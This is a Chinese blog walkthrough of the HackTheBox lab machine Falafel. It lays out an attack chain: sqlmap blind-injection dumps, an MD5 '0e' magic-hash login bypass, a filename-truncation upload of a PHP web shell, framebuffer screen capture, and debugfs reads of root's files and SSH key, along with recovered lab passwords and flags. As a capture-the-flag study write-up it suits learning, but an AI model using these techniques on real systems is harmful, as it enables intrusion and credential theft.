[Meachines] [Hard] Falafel SQLMAP 登入页面盲注+文件截断上传+MCollider(MD5枚举)+/dev/fb0帧缓冲器+debugfs权限提升

已于 2024-09-09 15:29:50 修改
阅读量889 收藏 12
点赞数 29
分类专栏: HackTheBox 文章标签: php
于 2024-09-09 15:29:30 首次发布
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/142060237
版权

信息收集

IP AddressOpening Ports
10.10.10.73TCP:22,80

$ nmap -p- 10.10.10.73 --min-rate 1000 -sC -sV

PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
|   256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_  256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp    open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/*.txt
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP && SQLMAP 登入页面盲注

http://10.10.10.73/

image.png

image-1.png

username=admin’ and ‘1’=‘1’–+&password=

image-6.png

username=admin’ and ‘1’=‘2’–+&password=

image-7.png

为了测试盲注入,我们可以在页面上查找根据我们的输入而变化的输出。我们知道,当用户名不存在时,用户名字段会显示“重试”,而当用户名存在时,用户名字段会显示“错误标识:admin”。如果查看sqlmap的手册页,–string选项显示“-string=STRING当查询被评估为True时匹配的字符串”。还有一个–not-string,表示查询为false。

image-2.png

image-3.png

$ sqlmap -r sql --level 5 --risk 3 --batch --string "Wrong identification"

image-4.png

$ sqlmap -r sql --level 5 --risk 3 --batch --string "Wrong identification" --dump

image-5.png

username:chris password:juggling

https://github.com/MartinxMax/MCollider

爆破admin用户md5值

$ python3 MCollider.py -md5 0e4620

image-15.png

[00:57:39][WARNING] -> 240610708 is contained by MD5:0e462097431906509019562988736854

使用密码登录管理员账户

image-16.png

文件截断

image-17.png

当我们上传一个png链接时会被保存在目录uploads/0909-0757_e7753937572b0b96中

image-18.png

http://10.10.16.17/test.php

image-19.png

根据用户的配置文件提示,跟长度有关

$ touch AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.png

http://10.10.16.17/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.png

提示总长度为241字节,已超出限制

image-20.png

并且后缀.png丢失

image-21.png

http://10.10.16.17/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.png

image-22.png

$ cp p0wny.php AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.png

http://10.10.16.17/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.png

image-23.png

http://10.10.10.73/uploads/0909-0811_ea7487f48ad80ceb/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php

image-24.png

www-data@falafel:/tmp$ cat /var/www/html/connection.php

image-25.png

username:moshe password:falafelIsReallyTasty

www-data@falafel:/tmp$ su moshe

image-26.png

User.txt

2b430278d922c8141b444ce36292e7f2

权限提升

moshe -> yossi

moshe@falafel:/tmp$ w

用户yossi已登入当前主机

image-27.png

/dev/fb0 是一个字符设备文件,代表第一个帧缓冲设备(framebuffer device)。帧缓冲是用于图形显示的一种机制,它允许程序直接操作显示屏的内存区域,从而实现图形输出。

image-28.png

moshe@falafel:/tmp$ cat /dev/fb0 > /tmp/screenshot.raw

要查看此文件,我们还需要屏幕分辨率,可以在/sys/class/graphics/fb0/中找到:

moshe@falafel:/tmp$ cat /sys/class/graphics/fb0/virtual_size

image-29.png

$ scp moshe@10.10.10.73:/tmp/screenshot.raw /tmp/

image-30.png

使用GIMP打开raw文件并且设置分辨率1176,885
然后将其导出为png

image-32.png

username:yossi password:MoshePlzStopHackingMe!

image-33.png

SDA

yossi@falafel:/tmp$ df

image-34.png

查找系统中块设备信息

yossi@falafel:~$ blkid

image-35.png

sda1是主磁盘,sda2是交换磁盘

使用debugfs命令以交互方式检查和修改文件系统的内部结构

yossi@falafel:~$ debugfs /dev/sda1

debugfs: cat /root/root.txt

Root持久化

debugfs: cat /root/.ssh/id_rsa

image-36.png

$ chmod 600 ./id_rsa

$ ssh -i /tmp/id_rsa root@10.10.10.73

image-37.png

Root.txt

1f0167a6445788cc5c03f8ac93b82f71

Мартин.
关注
专栏目录
hackthebox-falafel (考点:手工盲注 & php hash 漏洞 & 上传 & video组提权 & disk组提权) 不用sqlmap
冬萍子癸水
05-08 707
1扫描 常规22可能ssh登录,80进web搜集信息。 2web搜集 dirbuster扫,可以看到上传 php,应该是考上传。 进去看到登录框,按习惯第一反应输入admin,提示admin的密码错误,如果随便瞎输入用户名,提示try again。说明admin是存在的,以及让我们知道正确显示和错误显示报错机制是怎样的。因为这个涉及到hydra解密或者sql注入都需要这个。 先最简单的SQL注入试试admin' or '1'='1这些,没用, 再hydra hydra -l admin -P /usr/sh
python编程:从入门到实践-4操作列表+5if语句
hehe20190825的博客
03-19 135
列表 magicians = ['alice', 'david', 'carolina'] #遍历:遍历列表的所有元素,对每个元素执行相同的操作 for magician in magicians: print(magician) #创建数值列表:range() for value in range(1,5): print(value) #将range()的结果直接转换为列表:...
Python学习小记--列表/元组/字典/函数
LinSeeker85的博客
02-01 224
# range中定步长range(start, end, step) members = list(range(2,10,2)) print(members)  #[2, 4, 6, 8] # 两个星号**表示乘方 squares = [] for val in range(1,10):  # 不包含右闭包     square = val **2     squares.append(...
python编程:从入门到实践 第四章知识汇总 + 习题4-1~4-13
m0_59856692的博客
07-14 493
4-1 比萨:想出至少三种你喜欢的比萨,将其名称存储在一个列表中,再使用for 循环将每种比萨的名称都打印出来。 修改这个for 循环,使其打印包含比萨名称的句子,而不仅仅是比萨的名称。对于每种比萨,都显示一行输出,如“I like pepperoni pizza”。 pizzas = ["chicken pizza", "Beef Pizza", "vegetable pizza"] for pizza in pizzas: print("I like "+ pizza....
python遍历列表指定部分_零基础学python_11_列表(切片+遍历切片+复制)
weixin_39708636的博客
11-26 651
1.列表切片要创建切片,可指定要使用的第一个元素和最后一个元素的索引。与函数 range() 一样, Python 在到达你指定的第二个索引前面的元素后停止。要输出列表中的前三个元素,需要指定索引 0~3 ,这将输出分别为 0 、 1 和 2 的元素。下面的示例处理的是一个运动队成员列表:players = ['charles', 'martina', 'michael', 'florence',...
【编测编学】零基础学python_11_列表(切片+遍历切片+复制)
mmr910603的专栏
11-27 239
1.列表切片 要创建切片,可指定要使用的第一个元素和最后一个元素的索引。与函数 range() 一样, Python 在到达你指定的第二个索引前面的元素后停止。要输出列表中的前三个元素,需要指定索引 0~3 ,这将输出分别为 0 、 1 和 2 的元素。 下面的示例处理的是一个运动队成员列表: players = ['charles', 'martina', 'michael', 'florence', 'eli'] print(players[0:3]) 复制代码 处的代码打印该列表的一个切片
《Python编程:从入门到实践》学习打卡3-操作列表+元组
qq_45437968的博客
06-15 157
操作列表 遍历列表 方法:for循环, magicians = ['david','hart','jerry','kurt'] for magician in magicians: # 在列表magicians按顺序读取元素赋值给变量magician print(magician) print(magician.title() + ',that is a great trick\n') david David,that is a great trick hart Hart,that is a
《Python编程:从入门到实践》学习笔记(知识点梳理+练习题答案代码)——第4章 操作列表
weixin_60019958的博客
04-10 1531
本文为作者自学《Python编程:从入门到实践》第4章的学习笔记,根据原书将重要知识点梳理一遍,并附上课后练习题“动手试一试”的原创答案代码。
Python库 | falafel-0.3.2.tar.gz
04-08
资源分类:Python库 所属语言:Python 资源全名:falafel-0.3.2.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
falafel-espree:使用espree而不是橡子的沙拉三明治的叉子
05-08
沙拉三明治 使用而不是的叉子 安装 使用安装: npm install falafel-espree 为什么? 参见 。 TLDR ; 结合了沙拉三明治的AST步行功能和espree的评论附件。 执照 麻省理工学院
falafel:一个Node.js框架,使在tray.io上构建连接器变得非常简单
04-30
Falafel使用基于JavaScript的架构作为connectors.json的超集,但是与connectors.json不同,该架构还直接影响操作的运行。 例如,使用required使得在connector.json以及操作级别中都required一个字段。 目录: 破坏...
python 提取列表元素切片 组成新列表_【编测编学】零基础学python_11_列表(切片+遍历切片+复制)...
weixin_39612849的博客
12-06 3000
1.列表切片要创建切片,可指定要使用的第一个元素和最后一个元素的索引。与函数 range() 一样, Python 在到达你指定的第二个索引前面的元素后停止。要输出列表中的前三个元素,需要指定索引 0~3 ,这将输出分别为 0 、 1 和 2 的元素。下面的示例处理的是一个运动队成员列表:players = ['charles', 'martina', 'michael', 'florence',...
sql注入第8关
m0_74741186的博客
10-08 477
CTFHub_技能树_Web之SQL注入——布尔盲注详细原理讲解_保姆级手把手讲解自动化布尔盲注脚本编写_ctfhub布尔盲注-CSDN博客。id=1' and length(database())=1--+ //查询数据库名字的长度。上一关是可以直接写入文件,试了一下这一关也是可以直接写入后门代码,然后用蚁剑去连接。但是这关的目的一个是让我们使用布尔注入,内容来自这,具体看这篇文章。那就只能用布尔盲注了,因为错误返回错误页面,正确返回正确页面。报错不提示报错信息,不适宜用报错注入,
使用API接口创建短链接【PHP版】
weixin_43833373的博客
10-10 619
C1N短网址(c1n.cn)还提供了丰富的短链接管理的API接口,只需进行简单的接口调用,就能将稳定好用的短链接系统接入到自己的产品中,极大地降低了开发成本。上述代码中使用到的token需要前往C1N短网址(c1n.cn)-控制台-我的信息进行查询。
Qualitor checkAcesso.php 任意文件上传漏洞复现(CVE-2024-44849)
0xSec
10-09 160
​Qualitor 8.24及之前版本存在任意文件上传漏洞,未经身份验证远程攻击者可利用该漏洞代码执行,写入WebShell,进一步控制服务器权限
【FastAdmin】全栈视角下的页面跳转实现:从原生html、javascrpt、php技术到jQuery、FastAdmin框架
田辛_DensinTian的专栏
10-09 645
页面跳转是Web开发中的基本操作,不同的技术栈提供了不同的实现方法。本文将详细介绍在原生JavaScript、原生HTML、原生PHP、jQuery以及FastAdmin框架中实现页面跳转的各种方法,并分析每种方法的优势、劣势和适用场景。
PHP智慧餐饮新风尚点餐系统
最新发布
2401_84593614的博客
10-10 482
总的来说,智慧餐饮新风尚点餐系统不仅为顾客带来了便捷、高效、个性化的点餐体验,也为餐厅提供了有力的运营支持。它让美食与科技实现了完美结合,让我们在享受美食的同时,也能感受到科技的魅力。如果你还没有尝试过这款点餐系统,不妨找个机会去体验一下,相信它会给你带来不一样的惊喜!
TestComplete轻松入门指南: Falafel Software全面解析
"TestCompleteMadeEasy" 是由 Lino Tadros 所著的一本指南,专为 Falafel Software Inc. 推出的自动化测试工具 TestComplete 提供全面的介绍。这本书旨在帮助读者轻松上手 TestComplete,这是一款屡获殊荣的自动化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值